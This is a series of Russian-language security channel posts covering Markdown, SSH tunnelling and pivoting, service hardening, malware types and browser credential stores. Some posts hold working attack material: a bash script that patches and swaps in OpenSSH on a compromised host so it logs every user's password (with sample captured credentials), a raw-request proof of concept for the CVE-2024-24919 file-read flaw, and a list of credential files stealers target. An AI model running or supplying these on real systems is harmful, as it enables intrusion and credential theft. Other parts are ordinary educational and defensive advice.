Привет 💥 На связи @pyfffe

Хочу осветить такой язык разметки текста, как Markdown.

Markdown (сокращенно MD) - это язык разметки, стремящийся упростить форматирование текста с сохранением читабельности без исходников. При этом он имеет достаточно богатый и расширяемый функционал с возможностью перевода в другую разметку на случай необходимости. И в отличие всяких html и xml, в MD отсутствуют теги.

Вот пример разметки:

## 📅 **Задачи на сегодня**

- [x] Закончить отчет по проекту "Маркетинговая стратегия"
- [x] Подготовить презентацию для совещания
- [ ] Отправить приглашения на встречу с клиентом

## 📊 **Статистика по продажам:**

| Товар        | Продано, штук | Выручка, $ |
|--------------|---------------|------------|
| Монитор      | 20            | 500        |
| Клавиатура   | 35            | 700        |
| Мышь         | 30            | 300        |
| Наушники     | 15            | 450        |

Можно видеть, что сам код уже выглядит как красиво отредактированный текст.

Но это не всё. Можно также зайти на https://markdownlivepreview.com/ и посмотреть на это в обработанном виде.

Кто-то считает Markdown каким-то новомодным инструментом. При том, что его первый релиз состоялся еще в далёком 2004 гому и на сегодняшний день ему уже 20 лет. 🤷‍♂️

Из популярных примеров можно выделить его интеграцию в Github (Тот самый README.md), платформу notion, hackmd, medium, электронная книга HackTricks и много чего еще. Лично я предпочитаю писать заметки и посты на MD как раз из-за его простоты и некой аутентичности формата. ✨

#REDtalk #Markdown

Привет, друзья! 🌟 Сегодня я расскажу про SSH. Думаю, многим из вас уже известно, что это. Но для тех, кто по какой-то причине не знаком с ним, SSH - это сетевой протокол прикладного уровня, который позволяет осуществлять удаленное управление серверами. 💻 На практике мы очень часто используем его. Сегодня я собрал для вас несколько интересных команд, которые могут быть полезны в вашей работе. 🛠️

1. Удаленное выполнение команд:

ssh user@remotehost ваша_команда

# Цепочки команд на удаленном хосте
ssh user@remotehost "ваша_команда_1 | ваша_команда_2 | ваша_команда_3"

2. Копирование файлов:

# Загрузка на удаленный сервер
scp имя_файла user@remote_ip_addr:/удаленная_директория

# Скачивание с удаленного сервера
scp user@remote_ip_addr:/удаленная_директория/имя_файла /локальная_директория/имя_файла

3. Монтирование удаленных директорий:

Для этого используем SSHFS:

sshfs remotehost:/ ~/local_dir

4. Pivoting через SSH:

Представим, что мы взломали сервер и на нем есть приложение, которое запущено на порту, к которому нет доступа снаружи, но есть доступ с сервера.

Команда:

ssh -L 6512:localhost:5678 root@serverIP

После этого мы можем использовать приложение напрямую, как будто оно было запущено локально.

Также можно открывать доступ не к локальному порту сервера, а к удаленному порту другой машины, доступной с сервера, используя ключ N, тем самым выстраивая цепочки из ssh-тунелей:

ssh -L 6512:remote_server2:8080 user@remote_server1 -N

# Цепочка
ssh -L 6512:localhost:6512 user@remote_server1 ssh -L 6512:localhost:2375 -N user2@remote_server2

Можно создать защищенную цепочку SSH-тунелей, где трафик второго сервера не будет виден на первом сервере:

ssh -L 6513:server2:22 -N root@server1 ssh -L 6512:localhost:2375 -N -p 6513 root@localhost

5. Reverse SSH:

На нашем сервере:

ssh -R port:localhost:22 remotehost

# Например:
ssh -R 2256:localhost:22 remotehost

На целевой машине:

ssh localhost -p 2256

Ключ R работает по такому же принципу, как и ключ L, но подключение идет к нашей машине.

#ToolTricks #pentest

💥 Привет, В дополнение к предыдущему посту хочу показать еще одну интересную “фишку” ssh

Представим ситуацию, что в процессе редтима мы получили доступ к линуксовому серверу и повысились до рута, что привело к его полной компрометации. Что делать дальше? Как продвигаться по сети?

На мой взгляд, первое, что нужно сделать после закрепления, это внедрить все возможные логгеры и прослушки пользовательского ввода.

Тут как раз приходит на помощь ssh. С его помощью можно спокойно перехватить учётные данные любого подключающегося пользователя. Но для этого нужно пропатчить и перекомпилировать openssh. Вот небольшой bash скрипт для патчинга и компиляции

# 
# Не стоит его выполнять просто Ctrl+C Ctrl+V, и уж тем более не на какой-то важной машине 😁
#

# Устанавливаем зависимости
sudo apt update
sudo apt install libpam-dev libssl-dev build-essential autoconf

# Скачиваем исходники
cd /tmp
git clone https://github.com/openssh/openssh-portable
cd openssh-portable

# Патчим
sed -e 's/^\([ \t]*\)\(struct passwd \*pw = authctxt->pw;\)/\1logit("Login attempt by username '\''%s'\'', password '\''%s'\''", authctxt->user, password);\n\1\2/' -i auth-passwd.c

# Компилируем
autoreconf
./configure --with-pam
make

# Изменяем /etc/ssh/sshd_config
cp /etc/ssh/sshd_config /etc/ssh/sshd_config.bak
sed -e 's/^#[ ]*HostKey/HostKey/' -i /etc/ssh/sshd_config

# Заменяем ssh-сервер
sudo systemctl stop ssh
sudo mkdir /usr/local/libexec
sudo cp sshd-session /usr/local/libexec
/tmp/sshd/sshd -D -f /etc/ssh/sshd_config

И как результат, администратор, не зная, что машина скомпрометирована, подключается к нашему поддельному ssh-серверу и спокойно вводит учётные данные

2024-05-22T18:22:48.465415+03:00 ubuntu sshd[287253]: Server listening on 0.0.0.0 port 22.
2024-05-22T18:22:48.465515+03:00 ubuntu sshd[287253]: Server listening on :: port 22.
2024-05-22T18:23:05.369739+03:00 ubuntu sshd-session[287271]: Login attempt by username 'admin', password 'Sup3rStr0ngAdm1nP@ssw0rd'
2024-05-22T18:23:05.400492+03:00 ubuntu sshd-session[287271]: pam_unix(sshd-session:auth): authentication failure; logname=ubuntu uid=0 euid=0 tty=ssh ruser= rhost=127.0.0.1  user=admin
2024-05-22T18:23:07.070018+03:00 ubuntu sshd-session[287271]: Failed password for admin from 127.0.0.1 port 35226 ssh2
2024-05-22T18:23:09.858256+03:00 ubuntu sshd-session[287271]: Login attempt by username 'admin', password 'Sup3rStr0ngAdm1nP@ssw0rd1337'
2024-05-22T18:23:09.893910+03:00 kaubuntu i sshd-session[287271]: Accepted password for admin from 127.0.0.1 port 35226 ssh2
2024-05-22T18:23:09.894635+03:00 ubuntu sshd-session[287271]: pam_unix(sshd-session:session): session opened for user admin(uid=1000) by admin(uid=0)
2024-05-22T18:23:11.862494+03:00 ubuntu  sshd-session[287427]: Received disconnect from 127.0.0.1 port 35226:11: disconnected by user
2024-05-22T18:23:11.862963+03:00 ubuntu sshd-session[287427]: Disconnected from user admin 127.0.0.1 port 35226

Стоит упомянуть, что существует проверка сигнатуры ключа при повторных подключениях, и если открытые ключи не совпадают, то ssh-клиент не выполняет аутентификацию с грозным сообщением WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED!

А упомянуть это стоит для того, что при подключении к поддельному сообщению никакой ошибки не будет, так как ключи на поддельном сервер используются те же, что и раньше 😈

Приветствую Вас, дорогие друзья!👋🏻

В крайнем своем посте делился с Вами аналитическими отчетами. Коллеги из Kaspersky, как Вы помните, поделились с нами аналитикой по направлениям Incident Response и Managed Detection and Response. И вот на этой неделе они представили на изучение свой отчет-исследование российского ландшафта киберугроз, по аналогии с ранее подготовленным от BI.ZONE. В нем всё, как мы любим: тактики, техники и процедуры злоумышленников (TTPs), применяемое ВПО и т.д. Мы с командой уже взяли его в работу. 🔥

Думаю, что в следующих постах наложу друг на друга наши результаты по обработке материалов от BI.ZONE и Kaspersky и поделюсь с Вами тем, какую практическую пользу мы с командой из них извлекли. Во всяком случае на основе информации от BI.ZONE уже активно разрабатываем правила корреляции и проверяем их с моими "красными" коллегами. 🧑🏻‍💻


Уверен, что Вам будет интересно и Вы извлечете из них максимальную пользу в своей работе.

#REDtalk #blueteam

Привет, друзья! Сегодня у нас на повестке дня CVE-2024-24919. Эта уязвимость в Check Point Remote Access VPN позволяет читать файлы на хосте (LFI), причем с привилегиями root. Уязвимыми являются следующие продукты:

- CloudGuard Network
- Quantum Maestro
- Quantum Scalable Chassis
- Quantum Security Gateways
- Quantum Spark Appliances

- Версии:
- R77.20 (EOL)
- R77.30 (EOL)
- R80.10 (EOL)
- R80.20 (EOL)
- R80.20.x
- R80.20SP (EOL)
- R80.30 (EOL)
- R80.30SP (EOL)
- R80.40 (EOL)
- R81
- R81.10
- R81.10.x
- R81.20

POC

POST /clients/MyCRL HTTP/1.1 
Host: target_host 
Content-Length: 63 
 
aCSHELL/../../../../../../../etc/passwd

Рекомендуем срочно установить обновления: https://support.checkpoint.com/results/sk/sk182336

#cve

💥Привет. хочу поговорить на такую тему:

Допустим, мы - крутая команда пентестеров и редтимиров, и у нас в арсенале есть важный хакерский сервис WebMap и три проблемы: сервис торчит наружу, работает по протоколу http и не требует аутентификации. Вопрос, как сделать так, чтобы нас всех не уволили, добавить шифрование, аутентификацию и при этом оставить возможность подключаться из интернета?

Вот несколько вариантов решения:

1️⃣ VPN - 3 заглавных буквы, а сколько смысла. Ставим Wireguard, генерируем конфиги, проверяем, что порт больше не открыт из вне и радуемся. Теперь только те, у кого есть доступ к “внутренней сети”, могут получить доступ.

Теперь минус - это относительная сложность. Генерировать и управлять конфигами, маршрутами, пробросами портов не то чтобы очень сложно, но и не просто. Для скрытия сети это подойдёт идеально, но для одного сервиса есть способы более элегантные.

2️⃣ Proxy - Золотая середина. Можно просто оборачивать весь http трафик в ssl через nginx-прокси в докер контейнере, да еще и добавить базовую http аутентификацию. Это всё можно сделать на том же сервере, только не забыть убрать порт из публичного доступа.

    # HTTPS сервер
    server {
        listen 443 ssl;
        server_name example.com;
    
        # Пути к сертификатам
        ssl_certificate /etc/nginx/certs/fullchain.pem;
        ssl_certificate_key /etc/nginx/certs/privkey.pem;
    
        # Настройки HTTPS
        ssl_protocols TLSv1.2 TLSv1.3;
        ssl_prefer_server_ciphers on;
        ssl_ciphers 'EECDH+AESGCM:EDH+AESGCM:AES256+EECDH:AES256+EDH';
    
        # Логика обработки запросов
        location / {
            proxy_pass http://127.0.0.1:80;
    
            # HTTP Basic Auth
            auth_basic "Restricted Content";
            auth_basic_user_file /etc/nginx/.htpasswd;
        }
    }
    

Запрет на прямой доступ из интернета через iptables

    iptables -A INPUT -p tcp --dport 80 -s 127.0.0.1 -j ACCEPT
    iptables -A INPUT -p tcp --dport 80 -j DROP

Но и тут есть несколько камней: Трафик проходит через прокси, а значит запрос будет видоизменяться. Например, у меня была ситуация, когда мне нужно было загрузить файл (не скан nmap 😁) на сервер, а он брал и говорил ошибку 413 Payload Too Large. Проблема была в максимальном размере запроса, передаваемом в Nginx. Фиксилось это легко, строчкой client_max_body_size 0; в вышеуказанном конфиге Nginx. Также любой для нашего проксируемого приложения любой адрес запроса будет 127.0.0.1, так как он также проходит через прокси. Это тоже фиксится строчкой в конфиге, но неприятен сам факт изменения заголовков. Есть еще самоподписываемые сертификаты, но это так, чтобы держать в голове.

3️⃣ SSH-Tunneling: Уже второй раз ссылаюсь на наш пост про SSH. Моё любимое из трех перечисленных, так как тут всё максимально просто - создаём учётку, исключаем порт из публичного доступа и подключаемся к серверу по SSH с флагом -L 80:127.0.0.1:80. Таким образом убиваем трёх зайцев - Весь трафик передается в шифрованном виде через туннель SSH, аутентификация прилагается, да еще и сам порт будет полностью невидимым для внешней сети. Можно отключить ICMP, изменить порт 22 на какой-нибудь 13372 и быть практически невидимым. Для ботов уж точно

Недостатков я тут вообще не вижу, разве что “неконтролируемый” доступ, так как при подключении по ssh, клиент, очевидно, помимо туннеля к нашему сервису, имеет SSH сессию. Но думаю, это можно пофиксить

Была у меня ситуация, когда для стандартного сценария социалки, при разворачивании GoPhish через 5 секунд адрес моего сервера в Google Chrome был помечен как самый опасный в мире и перед его посещением было буквально окно с красным фоном и предупреждением на весь экран. Оказалось, что это всё из-за торчащей наружу админки GoPhish, которую обнаружил бот гугла. Я просто сменил белый адрес и закрыл доступ к админке через ssh-туннель, и всё стало отлично.

Вот как-то так. Мы используем все три способа, в зависимости от ситуации. Может это и кажется смешным, но я и правда встретился с ситуацией, в которой один популярный хостинг, не буду показывать пальцем, имеет возможность по клику предустанавливать на ваш VPS wg-easy, которая имеет веб-интерфейс для генерации пользователей в Wireguard. Вот только этот веб-сервис (работающий в контейнере) не шифрует трафик и довольные обладатели собственного VPN качают сгенерированные конфиги через весь интернет прямо по http. Тут как раз очень пригодился бы прокси.

#redteam #ToolTricks

Дамы и господа, всех приветствую!🫶🏻

В нашей команде авторов небольшое пополнение - меня зовут Комаров Герман (@gkomarov23) и я тружусь во славу синих в команде @dolgihser

Несколько фактов о себе:

1️⃣ Самоучка

2️⃣ Получаю огромное удовольствие от обучения коллег первой линии

3️⃣ Сталкивался с работой apt-группировок

Перед собой ставлю задачу рассказать простым языком об интересных и актуальных техниках, которыми пользуются злоумышленники, и если по какой-либо из озвученных мной тем будет повышенный интерес, мы с командой красных составим более детальный технический разбор с демонстрацией инструментов, которые мы использовали, а также методами и способами защиты.

Будет интересно👌🏻

#REDtalk #blueteam

У меня к вам такой вопрос:

Используете ли вы свой личный ноутбук или компьютер для работы с корпоративными документами, проектами? Подключаетесь ли к корпоративной сети, с личных устройств? (Если да, ставь сходу 👾)
Казалось бы, что тут может быть такого, но..

Если посмотреть на это с точки зрения информационной безопасности вы являетесь так называемой "точкой входа" в корпоративную сеть.
У вас может стоять антивирус💉, вы можете знать, что такое цифровая гигиена, но вы - потенциально "самое слабое звено" во всей цепи которую кропотливо выстраивают сотрудники ИБ, и вот почему:

1. На ваше устройство не применяются групповые политики, которые существуют в организации (подключение к мониторингу🛡, где живые люди, будут на страже вашего устройства в режиме 24\7, а также всеми любимая регулярная смена пароля ну и т.п.)

2. Мало кто занимается разграничением прав у себя на устройстве, как правило у вашей УЗ права администратора😎 (что не очень хорошо)

3. Вы вольны скачивать что угодно и откуда угодно, это же ведь ваш компьютер💻

При попадании на хост злоумышленник собирает информацию о том, где он оказался, и, когда поймет, что это устройство сотрудника крупной организации, в ход могут пойти разные сценарии, от загрузки стиллеров🦠 до продажи доступа к вашему устройству в даркнете и тогда могут прийти ребята посерьезней🥷.

Мой посыл достаточно прост: не смешивайте работу и личное (и я не только про ваши устройства), проверяйте, что вы загружаете и откуда, и берегите свои данные

Если понравился пост, поддержите 👍 и тогда дальше я расскажу о тех вирусах, с которыми вы можете столкнуться, загружая все подряд из интернета
#REDtalk #blueteam

Какие цели преследуют киберпреступники🧑‍💻?

Конечная цель, как правило, это 💰, и в зависимости от того сколько у злоумышленника времени и навыков будет зависеть на сколько большой куш он может сорвать.

Одним из первых шагов к достижению своей заветной цели является получение первоначального доступа. Он достигается путем использования таких методов как загрузка вредоносного программного обеспечения (ВПО) и фишинг.

И сегодня я хочу затронуть тему ВПО, какие они бывают, а так же по каким признакам можно быстро понять, что вы не просто рядовой пользователь, а еще и сотрудник организации.

Троян🐎
Основная специфика трояна - это обманывать жертв, за счёт применения оболочки легитимного ПО, и при запуске, он выполняет то, что нужно злоумышленникам.

Червь 🪱
Основная специфика червя - это его саморепликация, за счёт которой он становится способным дублировать себя как в пределах одной системы, создавая многочисленные копии в каталогах, так и перемещаясь по системам, создавая в каждой отдельной свою копию.

Шифровальщик 🔐
Основная специфика шифровальщика - это шифрование файлов на системе жертвы, таким образом, чтобы жертва не могла восстановить всё ранее зашифрованное. Как правило шифровальщики выгружают файлы с вашего устройства, чтобы использовать их в качестве шантажа.

Бэкдор (средство удаленного администрирования). 🚪
Бэкдор, или RAT (remote administration tool), — это приложение, которое позволяет честному системному администратору или злобному злоумышленнику управлять вашим компьютером на расстоянии.

Стиллер 🥷
Основная специфика стиллера - это автоматическая кража информации с системы жертвы.

Установщик📥
Основная специфика установщика - это автоматическое скачивание и запуск программ.

А одним из самых простых способов, понять, что перед атакующими сотрудник – это просмотр учетных данных браузера.
Вот список наиболее «просматриваемых» атакующими файлов:

• C:\Users\$user\AppData\Local\Google\Chrome\UserData\Default\LoginData
• C:\Users\$user\AppData\Local\Mozilla\Firefox\Profiles\*.default\key4.db
• C:\Users\$user\AppData\Local\Google\Chrome\UserData\LocalState
• C:\Users\$user\AppData\Local\Mozilla\Firefox\Profiles\*.default\key3.db
• C:\Users\$user\AppData\Local\Google\Chrome\UserData\Default\WebData
• C:\Users\$user\AppData\Local\Mozilla\Firefox\Profiles\*.default\logins.json

Ниже привел данные которые я нашел у себя:

6f6fef3b-6c10-4605-8e91-2be26833ef61{"billing_address_id":"","card_holder":"GERMAN KOMAROV","card_title":"","expire_date_month":"12","expire_date_year":"2023","masked_card_number":"480023******0001","origin":"","use_count":18,"use_date":1715928491.637655,"yandex_card_type":0}

OnLoginSuccessful@password_manager.cc:1285Detected successful login.{"context_data":null,"data":{"action":"https://jira.organization.ru/login.jsp","all_alternative_usernames":"komarov_g+5+os_username","last_url":"https://jira.organization.ru/login.jsp","password_element":"os_password","signon_realm":"https://jira.organization.ru/","submission_event":1,"url":"https://jira. organization.ru/login.jsp","username_element":"os_username","username_value":"komarov_g"}}

"url":"https://skyarc.ru/signup","username_element":"email","username_value":komarov_g@mail.ru'

Учетные данные, хранящиеся в браузерах, могут быть интересны как сами по себе, так и в связи с дальнейшим развитием атаки. Сами по себе данные обычно собираются стиллерами и затем продаются или выкладываются в открытый доступ. Также секреты пользователей могут содержать данные для аутентификации на внутренних ресурсах организации или раскрывать информацию о их местонахождении. Так же можно поискать пароли, которые были слиты, история браузера, логины у нас есть.

Ради интереса, посмотрите, какие данные получится достать у вас)
P.S. папка AppData скрыта, как просматривать скрытые файлы, можно узнать тут, а данные можно посмотреть, открыв их в текстовом редакторе

Ну а в следующем посте подготовлю подробную инструкцию по созданию лаборатории для анализа файлов и проанализируем с вами какой-нибудь интересный файлик🦠.

#blueteam